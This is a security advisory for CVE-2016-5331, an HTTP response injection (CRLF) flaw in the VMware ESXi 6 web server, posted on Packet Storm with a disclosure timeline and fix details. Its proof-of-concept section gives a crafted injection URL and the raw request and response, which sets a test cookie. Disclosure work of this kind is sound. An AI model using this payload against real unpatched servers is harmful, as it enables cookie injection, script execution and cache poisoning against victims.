exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

VMware vSphere Hypervisor (ESXi) HTTP Response Injection

VMware vSphere Hypervisor (ESXi) HTTP Response Injection
Posted Aug 5, 2016
Authored by Matthias Deeg | Site syss.de

The SySS GmbH found out that the web server of VMware ESXi 6 is vulnerable to HTTP response injection attacks, as arbitrarily supplied URL parameters are copied in the HTTP header Location of the server response without sufficient input validation. Thus, an attacker can create a specially crafted URL with a specific URL parameter that injects attacker-controlled data to the response of the VMware ESXi web server. Depending on the context, this allows different attacks. If such a URL is visited by a victim, it may for example be possible to set web browser cookies in the victim's web browser, execute arbitrary JavaScript code, or poison caches of proxy servers.

tags | exploit, web, arbitrary, javascript
advisories | CVE-2016-5331
SHA-256 | 0ea7840b55195ffc59088e4202c17bca17d25971220fb512df76ebf66e0575f9

VMware vSphere Hypervisor (ESXi) HTTP Response Injection

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2016-063
Product: VMware vSphere Hypervisor (ESXi)
Manufacturer: VMware, Inc.
Affected Version(s): VMware ESXi 6.0.0 build 3380124 (Update 1)
VMware vCenter Server 6.0 U2
Tested Version(s): VMware ESXi 6.0.0 build 3380124 (Update 1)
Vulnerability Type: Improper Input Validation (CWE-20)
Risk Level: Medium
Solution Status: Fixed
Manufacturer Notification: 2016-07-01
Solution Date: 2016-08-04
Public Disclosure: 2016-08-05
CVE Reference: CVE-2016-5331
Authors of Advisory: Matthias Deeg (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

VMware vSphere Hypervisor is a type-1 hypervisor for serving virtual
machines.

The manufacturer describes the product as follows (see [1]):

"Virtualize even the most resource-intensive applications with peace of
mind. VMware vSphere Hypervisor is based on VMware ESXi, the hypervisor
architecture that sets the industry standard for reliability and
performance."

Due to improper input validation, the web server of VMware ESXi 6 is
prone to HTTP response injection attacks.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The SySS GmbH found out that the web server of VMware ESXi 6 is
vulnerable to HTTP response injection attacks, as arbitrarily supplied
URL parameters are copied in the HTTP header Location of the server
response without sufficient input validation.

Thus, an attacker can create a specially crafted URL with a specific
URL parameter that injects attacker-controlled data to the response
of the VMware ESXi web server.

Depending on the context, this allows different attacks. If
such a URL is visited by a victim, it may for example be possible to
set web browser cookies in the victim's web browser, execute arbitrary
JavaScript code, or poison caches of proxy servers.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The following URL is a simple attack vector to illustrate the HTTP
response header injection vulnerability by setting an
attacker-controlled session cookie named "test" with the value "31337"
within the victim's web browser:

https://<HOST>/?syss%0d%0aset-cookie:test=31337%0d%0at=1

The corresponding HTTP GET request and the VMware ESXi web server
response are as follows:

GET /?syss%0d%0aset-cookie:test=31337%0d%0at=1 HTTP/1.1
Host: <HOST>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close


HTTP/1.1 303 See Other
Date: Thu, 30 Jun 2016 15:12:23 GMT
Connection: close
Location: /?syss
set-cookie:test=31337
t=1/
X-Frame-Options: DENY
Content-Length: 0

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The manufacturer VMware has fixed the reported security vulnerability
and disclosed detailed information about the issue and a software update
for affected products in its security advisory VMSA-2016-0010 [4].

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2016-07-01: Vulnerability reported to manufacturer
2016-07-01: Manufacturer acknowledges e-mail with SySS security advisory
2016-07-14: Manufacturer further investigates the reported security
issue
2016-07-22: Manufacturer announces disclosure of this security issue
2016-08-04: Public release of VMware security advisory VMSA-2016-0010
and security update
2016-08-05: Public release of SySS security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for VMware vSphere Hypervisor (ESXi)
https://my.vmware.com/web/vmware/info/slug/datacenter_cloud_infrastructure/vmware_vsphere_hypervisor_esxi/6_0
[2] SySS Security Advisory SYSS-2016-063
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-063.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/
[4] VMware Security Advisory VMSA-2016-0010
http://www.vmware.com/in/security/advisories/VMSA-2016-0010.html

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was independently found and reported by
Matthias Deeg of SySS GmbH, Vladimir Ivanov, Andrey Evlanin, Mikhail
Stepankin, Artem Kondratenko, Arseniy Sharoglazov of Positive
Technologies, Matt Foster of Netcraft Ltd, Eva Esteban Molina of
A2secure and Ammarit Thongthua (see [4]).

E-Mail: matthias.deeg (at) syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc
Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2

iQIcBAEBCgAGBQJXpF3hAAoJENmkv2o0rU2rJr0P/RYc3j268fzTLERUG5CvLKYV
HNI1a4p2/Mg0lzc/n1/7aZOzX9eRQe0jVyFkv90/843IWCdofQU3aqLBwFSIsFZP
C9Tv3JYpk4T68uzCIriqxqHgt+qza1evfmPTOP2RHua0iaOOQSohzY/cWo3Uc9Yj
Qag+JmnwPWZJNzkL1i41F6oO6aKurM65XBtmAdKQVQwwJ1WYMpiM3vV71hIq18sO
OSJOgKQQMAR/1U7UVd3IgFIUv4+2mdDPyEdlnzPiTtpmJvZQf8H3k9054auCWBWa
U2WOesD5FsCS4nBmuvlTc+jALlqC2SRRgR1UpiEvXTYYunWrOFustGnj4fFvgg7S
omtMdN8dnWdD6BXZXg2k/yVH0WToVWtwV0meKtSg9b0jOywKBVzoYO19vpchHaz4
/Eyxd8HQHpToM3OgwHagFXosF3TGxwQySPlDHdQD5gYANzDBhS8uQ02Gwx2v9NCX
cC/jbTDUC0fa2qNJL/wwN7unqmrdOkGEYlvTjme6wlDR5axB46GunSH5yNg5OKFl
G1s7lZ+ZbcywBxScLx1k7ITa1tNL3PNet5/Ld6A1hi3yhONmRgkyfgB+YqN04xaR
3b5U6eqnPfm8d52yVPa7zySVc1vN9mrQ87dCmnXWGE9xk++SXoeDLv3PbKrY65Iy
w/x007duLbe7k/xSJ1Ip
=/k7W
-----END PGP SIGNATURE-----
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close